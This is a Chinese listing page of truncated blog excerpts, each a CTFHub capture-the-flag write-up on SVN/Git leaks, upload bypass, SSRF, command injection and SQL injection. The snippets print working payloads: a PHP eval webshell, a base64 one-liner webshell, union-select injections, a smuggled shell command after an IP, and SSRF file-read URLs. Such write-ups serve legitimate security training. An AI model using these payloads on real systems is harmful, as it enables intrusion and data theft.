- 2024-10-27【刷题10】2024.10.26
来源:CTFHubSVN泄露扫描一下目录,发现有/svn,所以是svn泄露使用工具dvcs-ripper将泄露的文件下载到本地目录中先用ls-al查看,再转到.svn文件夹中查看下载的文件。根据题目可知,在旧版服务器,所以访问pristime文件夹,在其中找到了flagctfhub{4e0bf99268e97
- 2024-10-23CTFHUB技能树之文件上传——MIME绕过
开启靶场,打开链接:直接指明是MIME验证新建04MIME.php文件,内容如下:<?phpecho"Ciallo~(∠・ω<)⌒★";@eval($_POST['pass']);?>(这里加了点表情,加带点私货)用burp抓包:将application/octet-stream改成image/png或者jpg和gif符合条件就行:之后再点击“forward”提
- 2024-09-01ctfhub-web-SSRF通关攻略
一、内网访问1.打开ctfhub给的环境地址2.观察题目发现让我们访问127.0.0.1下的flag.php在地址栏后面有一个url参数 ?url=http://127.0.0.1/flag.php 提交即可二、伪协议读取文件1.打开ctfhub给的环境2.观察题目发现让我们读取flag.php文件读取文件用到的协议是
- 2024-08-23ctfhub-rce-部分做题记录
命令注入检查网页显示内容,可以直接看到源代码。大致意思是:检查用户输入的GET请求,判断用户是否输入了ip信息。如果输入了ip信息,则使用用户输入的这个ip数据执行一个shell命令"ping-c4"。输入127.0.0.1;cat104211044913917.php没回显,查看源代码过滤cat输入
- 2024-08-23Ctfhub-SSRF部分做题记录
Ctfhub-SSRF部分做题记录上传文件提示:这次需要上传一个文件到flag.php了.祝你好运进入flag.php发现没有提交按钮修改源代码,加个提交按钮抓包修改host为127.0.0.1:80,乱码改成1111(随便,只要不是乱码)PHPimporturllib.parsepayload=\"""POST/flag.phpHTTP/1.1Host
- 2024-08-14Git泄露--------Log
步骤一:虚拟机运行命令:python2GitHack.py后跟网址http://challenge-d9ebdd73f20fda85.sandbox.ctfhub.com:10800/.git步骤二:切换到dist文件下步骤三:查看目录下内容:ls-la步骤四:进入.dist目录下:cd.git步骤五:输入命令查找:gitshow步骤六:复制内容提交FlagStash
- 2024-08-14CTFHub~SQL注入超简单详细教程
0x01整数型注入#本题告诉我们是整数型,所以就很容易了#判断字段数量1orderby2#判断回显点-1unionselect1,2#查询全部数据库名-1unionselect1,group_concat(schema_name)frominformation_schema.schemata#判断数据库中的表名-1unionselec
- 2024-08-13ctfhub UA头注入,refer,过滤空格
-1unionselect1,database()id=-1unionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()id=-1unionselect1,group_concat(column_name)frominformation_schema.columnswheretable_schema=database()andta
- 2024-08-01ctfhub-sql注入-injection-解题思路
1.打开题目,判断是数字型注入还是字符型注入 1.输入1’ //无回显 1‘ --+//也是没有回显 1” //无回显 1“--= //无回显都没有回显,所以判断为数字型注入2.使用命令进行判断
- 2024-07-26【CTFHub】FastCGI协议
第一步:开启环境后,打开kali虚拟机,第二步:生成一句话木马echo"PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+"|base64-d>shell.php第三步:Gopherus-master工具文件中打开终端,输入以下代码python2gopherus.py--exploitfastcgi 第四步将kali里面生成的代码复制进CTF在
- 2024-07-25CTFHUB-SQL注入-1
对于sql注入类型的题,首先判断注入点尝试发现注入点为?id=1'发现联合注入无法回显,尝试使用sqlmap先进行扫描sqlmap-u"http://challenge-1559e706c24187fa.sandbox.ctfhub.com:10800/?id=1'" 查询dbssqlmap-u"http://challenge-1559e706c24187fa.sandbox.ctfhub.co
- 2024-07-25CTFHub技能树 Web-SSRF系列通过全技巧(已完结)
1.内网访问url后面输入http://127.0.0.1/flag.php,得到Flag2.伪协议读取文件url后面输入file:///var/www/html/flag.php,然后右击页面查看页面源代码,得到Flag3.端口扫描第一步:在url后面输入http://127.0.0.1:5000,对本页面抓包,右击抓包界面,发送到Intruder第二
- 2024-07-24web专项
CTF-WEB-CTFhub注:以ctfhub练习网站为例!一:信息泄露1、目录遍历漏洞(1)原理:web服务器或者web应用程序对用户输入的文件名称未进行严格的验证过滤而导致的一种安全漏洞;让攻击者可以利用一些特殊的字符可以绕过服务器的安全限制、访问任意文件;就是没有过滤用户输入的./等目录跳跃符
- 2024-07-24CTFHub-SSRF解析合集
内网访问直接使用http://访问内网获取flag数据伪协议读取文件使用file://绝对路径读取flag.php数据,需要查看网页源代码使用file://绝对路径读取flag.php数据,需要查看网页源代码端口扫描1.打开靶场后访问随机一个端口,抓包2.将抓到的包发送到攻击
- 2024-07-07CTFHUB-彩蛋教程
目录1.首页2.公众号3.题目入口4.writeup5.工具6.赛事7.真题8.投稿提交6:1212:1818:2424:3030:3636:4242:481.首页根据提示,在原始首页查看页面源代码,无发现,经过不断尝试,发现访问api.ctfhub.com有回显api.ctfhub.com右键查看页面源代码,CTRL+F
- 2024-07-07CTFHUB-SSRF-302跳转 Bypass
开启题目,页面空白尝试访问127.0.0.1/flag.php页面?url=127.0.0.1/flag.php提示:不允许企业内部IP访问,使用file协议获取其源码,得到flag.php页面源码?url=file:///var/www/html/flag.php与之前一样,通过REMOTE_ADDR请求头限制本地IP请求,源码中并没有之前的hacker!BanI
- 2024-07-07CTFHUB-SSRF-数字IP Bypass
开启题目,页面空白根据提示,不能使用点分十进制,尝试将127.0.0.1转换为十六进制形式,也就是0x7f000001构造题目有所需Payload?url=0x7f000001/flag.php访问得到了flag八进制:0177.000.000.001十进制:127.0.0.1十六进制:0x7f000001进制转换网址:https://www.bchrt.com/tools
- 2024-07-07CTFHUB-SSRF-URL Bypass
开启题目给出提示,url参数的值中必须包含有http://notfound.ctfhub.com,可以采用@,也就是HTTP基本身份认证绕过HTTP基本身份认证允许Web浏览器或其他客户端程序在请求时提供用户名和口令形式的身份凭证的一种登录验证方式。也就是:http://
[email protected]形
- 2024-06-22Crypto(18)——CTFHub
栅栏解救signinlittleRSA脚本:点击查看代码importmodc=32949n=64741e=42667p=Noneforiinrange(2,n):ifn%i==0:p=ibreakq=n//pem=mod.Mod(e,(p-1)*(q-1))d=int(1//em)cm=mod
- 2024-06-22Misc(17)——CTFHub
Gradientsky下载题目附件,是一张图片:查看属性:无重要信息,拖入010中,搜索ctf,得到flag:word文件本质下载附件,是一个word文件,打开一堆文字:楚人居贫,读《淮南子》,得“螳螂伺蝉自障叶,可以隐形”,大喜。遂于树下仰望,欲觅螳螂伺蝉自障叶。偶见之,即缘而摘之,然不慎叶落树下。树下先有落
- 2024-06-11CTFHUB技能树之WEB前置技能HTTP协议
CTFHUB技能树WEB前置技能/HTTP协议请求方式根据提示可知,通过修改请求方式获取flag使用BurpSuite进行拦截,将GET方法改为CTFHUB方法即可。得到flag。302跳转打开BurpSuite进行拦截,将第一次请求发给重发器再次发送,得出flagCookie打开页面,得出提示信息,需要admin,将Cook
- 2024-06-03CTFHUB-信息泄露-目录遍历和PHPINFO
目录目录遍历PHPINFO目录遍历很简单,挨着把每个目录都点开看一下发现2目录下有个flag.txt文件,点开发现了本关的flagPHPINFO这关也很简单,进来之后是一个phpinfo页面,按CTRL+F键打开查询,输入flag,查找到了本关的flag
- 2024-06-03CTFHUB-密码口令-弱口令
目录题干介绍密码字典找flag过程尾声题干介绍通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。密码字典下载地址:GitHub-NepoloHebo/Commonly-used-weak-password-dictionary:常用弱密码字典包含了常见且容易猜测的密码组合。
- 2024-06-03CTFHUB-信息泄露-SVN泄露和HG泄露
目录SYN泄露方法1方法2HG泄露这两关我们需要用到一个泄露利用工具dvcs-riCpper和Perl环境,没有的就去下载,kali没有自带SYN泄露当开发人员使用SVN进行版本控制,对站点自动部署。如果配置不当,可能会将.svn文件夹直接部署到线上环境。这就引起了SVN泄露漏洞。因
- 2024-05-12CTFHUB-PHP-bypass_disable_functions
很多可以蚁剑插件自己做,因为本来就是蚁剑实验室的靶场,这里有些也就用手工方法,方便掌握原理。LD_PRELOAD看题目一眼环境变量劫持。蚁剑可以连,但是终端命令全被ban了。访问/?ant=phpinfo();查看禁用函数:pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,